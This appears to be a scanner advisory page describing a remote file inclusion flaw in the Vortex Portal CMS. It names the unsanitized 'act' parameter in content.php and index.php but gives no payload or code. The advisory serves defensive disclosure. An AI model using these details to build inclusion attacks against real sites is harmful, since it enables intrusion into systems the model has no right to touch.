Facebook Google Plus Twitter LinkedIn YouTube RSS Menu Search Resource - BlogResource - WebinarResource - ReportResource - Eventicons_066 icons_067icons_068icons_069icons_070

Vortex Portal Content Management System Multiple Remote File Inclusion

Medium

Synopsis

The remote host is vulnerable to a script injection attack.

Description

The remote host is running Vortex Portal, a content-management system for gaming. This version of Vortex is vulnerable to an 'include' file injection attack. Specifically, the 'act' variable of 'content.php' and 'index.php' is not properly sanitized by the Vortex application. An attacker exploiting this flaw would be able to include arbitrary malicious code within a URI. The attacker would then need to be able to convince a client to browse to the URI. A successful attack would result in the client browser executing malicious code within the context of the Vortex application.

Solution

Ensure that this application is allowed within corporate policies and guidelines.